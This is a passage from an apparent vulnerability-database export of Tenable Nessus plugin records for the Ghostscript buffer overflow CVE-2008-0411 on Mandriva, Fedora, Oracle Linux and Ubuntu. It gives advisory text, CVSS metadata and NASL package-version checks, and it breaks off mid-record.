(rpm_check(release:\"MDK2007.0\", cpu:\"i386\", reference:\"libijs1-0.35-47.1mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", cpu:\"i386\", reference:\"libijs1-devel-0.35-47.1mdv2007.0\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2007.1\", reference:\"ghostscript-8.15-48.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"ghostscript-X-8.15-48.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"ghostscript-common-8.15-48.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"ghostscript-doc-8.15-48.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"ghostscript-dvipdf-8.15-48.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"ghostscript-module-X-8.15-48.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"x86_64\", reference:\"lib64gs8-8.15-48.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"x86_64\", reference:\"lib64gs8-devel-8.15-48.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"x86_64\", reference:\"lib64ijs1-0.35-48.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"x86_64\", reference:\"lib64ijs1-devel-0.35-48.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"i386\", reference:\"libgs8-8.15-48.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"i386\", reference:\"libgs8-devel-8.15-48.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"i386\", reference:\"libijs1-0.35-48.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"i386\", reference:\"libijs1-devel-0.35-48.1mdv2007.1\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2008.0\", reference:\"ghostscript-8.60-55.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"ghostscript-X-8.60-55.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"ghostscript-common-8.60-55.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"ghostscript-doc-8.60-55.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"ghostscript-dvipdf-8.60-55.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"ghostscript-module-X-8.60-55.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64gs8-8.60-55.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64gs8-devel-8.60-55.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64ijs1-0.35-55.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64ijs1-devel-0.35-55.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libgs8-8.60-55.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libgs8-devel-8.60-55.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libijs1-0.35-55.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libijs1-devel-0.35-55.2mdv2008.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:06:26", "description": "This update contains a back-ported fix for a security issue that\nallows malicious PostScript input files to cause a stack-based buffer\noverflow (CVE-2008-0411). This update also restores JPEG2000 support.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2008-03-07T00:00:00", "title": "Fedora 8 : ghostscript-8.61-8.fc8 (2008-1998)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0411"], "modified": "2008-03-07T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:8", "p-cpe:/a:fedoraproject:fedora:ghostscript"], "id": "FEDORA_2008-1998.NASL", "href": "https://www.tenable.com/plugins/nessus/31364", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2008-1998.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(31364);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2008-0411\");\n script_bugtraq_id(28017);\n script_xref(name:\"FEDORA\", value:\"2008-1998\");\n\n script_name(english:\"Fedora 8 : ghostscript-8.61-8.fc8 (2008-1998)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update contains a back-ported fix for a security issue that\nallows malicious PostScript input files to cause a stack-based buffer\noverflow (CVE-2008-0411). This update also restores JPEG2000 support.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=431536\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2008-March/008424.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6e9de29f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ghostscript package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:ghostscript\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:8\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/03/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/03/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 8.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC8\", reference:\"ghostscript-8.61-8.fc8\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ghostscript\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T12:44:08", "description": "From Red Hat Security Advisory 2008:0155 :\n\nUpdated ghostscript packages that fix a security issue are now\navailable for Red Hat Enterprise Linux 3, 4, and 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nGhostscript is a program for displaying PostScript files, or printing\nthem to non-PostScript printers.\n\nChris Evans from the Google Security Team reported a stack-based\nbuffer overflow flaw in Ghostscript's zseticcspace() function. An\nattacker could create a malicious PostScript file that would cause\nGhostscript to execute arbitrary code when opened. (CVE-2008-0411)\n\nThese updated packages also fix a bug, which prevented the pxlmono\nprinter driver from producing valid output on Red Hat Enterprise Linux\n4.\n\nAll users of ghostscript are advised to upgrade to these updated\npackages, which contain a backported patch to resolve these issues.", "edition": 25, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 3 / 4 / 5 : ghostscript (ELSA-2008-0155)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0411"], "modified": "2013-07-12T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:ghostscript-gtk", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:hpijs", "cpe:/o:oracle:linux:3", "p-cpe:/a:oracle:linux:ghostscript", "p-cpe:/a:oracle:linux:ghostscript-devel", "cpe:/o:oracle:linux:4"], "id": "ORACLELINUX_ELSA-2008-0155.NASL", "href": "https://www.tenable.com/plugins/nessus/67660", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2008:0155 and \n# Oracle Linux Security Advisory ELSA-2008-0155 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(67660);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-0411\");\n script_bugtraq_id(28017);\n script_xref(name:\"RHSA\", value:\"2008:0155\");\n\n script_name(english:\"Oracle Linux 3 / 4 / 5 : ghostscript (ELSA-2008-0155)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2008:0155 :\n\nUpdated ghostscript packages that fix a security issue are now\navailable for Red Hat Enterprise Linux 3, 4, and 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nGhostscript is a program for displaying PostScript files, or printing\nthem to non-PostScript printers.\n\nChris Evans from the Google Security Team reported a stack-based\nbuffer overflow flaw in Ghostscript's zseticcspace() function. An\nattacker could create a malicious PostScript file that would cause\nGhostscript to execute arbitrary code when opened. (CVE-2008-0411)\n\nThese updated packages also fix a bug, which prevented the pxlmono\nprinter driver from producing valid output on Red Hat Enterprise Linux\n4.\n\nAll users of ghostscript are advised to upgrade to these updated\npackages, which contain a backported patch to resolve these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2008-February/000525.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2008-February/000526.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2008-February/000528.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ghostscript packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ghostscript\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ghostscript-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ghostscript-gtk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:hpijs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/02/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/02/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(3|4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 3 / 4 / 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"ghostscript-7.05-32.1.13\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"ghostscript-7.05-32.1.13\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"ghostscript-devel-7.05-32.1.13\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"ghostscript-devel-7.05-32.1.13\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"hpijs-1.3-32.1.13\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"hpijs-1.3-32.1.13\")) flag++;\n\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"ghostscript-7.07-33.2.el4_6.1\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"ghostscript-7.07-33.2.el4_6.1\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"ghostscript-devel-7.07-33.2.el4_6.1\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"ghostscript-devel-7.07-33.2.el4_6.1\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"ghostscript-gtk-7.07-33.2.el4_6.1\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"ghostscript-gtk-7.07-33.2.el4_6.1\")) flag++;\n\nif (rpm_check(release:\"EL5\", reference:\"ghostscript-8.15.2-9.1.el5_1.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"ghostscript-devel-8.15.2-9.1.el5_1.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"ghostscript-gtk-8.15.2-9.1.el5_1.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ghostscript / ghostscript-devel / ghostscript-gtk / hpijs\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T15:44:10", "description": "Chris Evans discovered that Ghostscript contained a buffer overflow in\nits color space handling code. If a user or automated system were\ntricked into opening a crafted Postscript file, an attacker could\ncause a denial of service or execute arbitrary code with privileges of\nthe user invoking the program. (CVE-2008-0411).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2008-04-11T00:00:00", "title": "Ubuntu 6.06 LTS / 6.10 / 7.04 / 7.10 : ghostscript, gs-esp, gs-gpl vulnerability (USN-599-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0411"], "modified": "2008-04-11T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:7.10", "p-cpe:/a:canonical:ubuntu_linux:ghostscript", "cpe:/o:canonical:ubuntu_linux:6.10", "p-cpe:/a:canonical:ubuntu_linux:ghostscript-x", "p-cpe:/a:canonical:ubuntu_linux:gs-gpl", "p-cpe:/a:canonical:ubuntu_linux:gs-common", "p-cpe:/a:canonical:ubuntu_linux:gs", "p-cpe:/a:canonical:ubuntu_linux:libgs8", "p-cpe:/a:canonical:ubuntu_linux:gs-aladdin", "p-cpe:/a:canonical:ubuntu_linux:libgs-esp8", "p-cpe:/a:canonical:ubuntu_linux:gs-esp-x", "p-cpe:/a:canonical:ubuntu_linux:ghostscript-doc", "p-cpe:/a:canonical:ubuntu_linux:libgs-dev", "p-cpe:/a:canonical:ubuntu_linux:libgs-esp-dev", "cpe:/o:canonical:ubuntu_linux:7.04", "p-cpe:/a:canonical:ubuntu_linux:gs-esp", "cpe:/o:canonical:ubuntu_linux:6.06:-:lts"], "id": "UBUNTU_USN-599-1.NASL", "href": "https://www.tenable.com/plugins/nessus/31848", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-599-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(31848);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2008-0411\");\n script_bugtraq_id(28017);\n script_xref(name:\"USN\", value:\"599-1\");\n\n script_name(english:\"Ubuntu 6.06 LTS / 6.10 / 7.04 / 7.10 : ghostscript, gs-esp, gs-gpl vulnerability (USN-599-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Chris Evans discovered that Ghostscript contained a buffer overflow in\nits color space handling code. If a user or automated system were\ntricked into opening a crafted Postscript file, an attacker could\ncause a denial of service or execute arbitrary code with privileges of\nthe user invoking the program. (CVE-2008-0411).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/599-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:ghostscript\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:ghostscript-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:ghostscript-x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:gs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:gs-aladdin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:gs-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:gs-esp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:gs-esp-x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:gs-gpl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libgs-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libgs-esp-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libgs-esp8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libgs8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.06:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:7.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:7.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/04/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/04/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2008-2019 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(6\\.06|6\\.10|7\\.04|7\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 6.06 / 6.10 / 7.04 / 7.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"6.06\", pkgname:\"gs\", pkgver:\"8.15-4ubuntu3.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"gs-esp\", pkgver:\"8.15.2.dfsg.0ubuntu1-0ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"gs-gpl\", pkgver:\"8.15-4ubuntu3.1\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"gs\", pkgver:\"8.50-1.1ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"gs-esp\", pkgver:\"8.15.2.dfsg.0ubuntu1-0ubuntu4.1\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"gs-gpl\", pkgver:\"8.50-1.1ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"libgs-esp-dev\", pkgver:\"8.15.2.dfsg.0ubuntu1-0ubuntu4.1\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"libgs-esp8\", pkgver:\"8.15.2.dfsg.0ubuntu1-0ubuntu4.1\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"gs\", pkgver:\"8.54.dfsg.1-5ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"gs-esp\", pkgver:\"8.15.4.dfsg.1-0ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"gs-esp-x\", pkgver:\"8.15.4.dfsg.1-0ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"gs-gpl\", pkgver:\"8.54.dfsg.1-5ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"libgs-esp-dev\", pkgver:\"8.15.4.dfsg.1-0ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"libgs-esp8\", pkgver:\"8.15.4.dfsg.1-0ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"ghostscript\", pkgver:\"8.61.dfsg.1~svn8187-0ubuntu3.4\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"ghostscript-doc\", pkgver:\"8.61.dfsg.1~svn8187-0ubuntu3.4\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"ghostscript-x\", pkgver:\"8.61.dfsg.1~svn8187-0ubuntu3.4\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"gs\", pkgver:\"8.61.dfsg.1~svn8187-0ubuntu3.4\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"gs-aladdin\", pkgver:\"8.61.dfsg.1~svn8187-0ubuntu3.4\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"gs-common\", pkgver:\"8.61.dfsg.1~svn8187-0ubuntu3.4\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"gs-esp\", pkgver:\"8.61.dfsg.1~svn8187-0ubuntu3.4\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"gs-esp-x\", pkgver:\"8.61.dfsg.1~svn8187-0ubuntu3.4\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"gs-gpl\", pkgver:\"8.61.dfsg.1~svn8187-0ubuntu3.4\")) flag++;\nif (ubuntu_check(osver:\"7.10\", 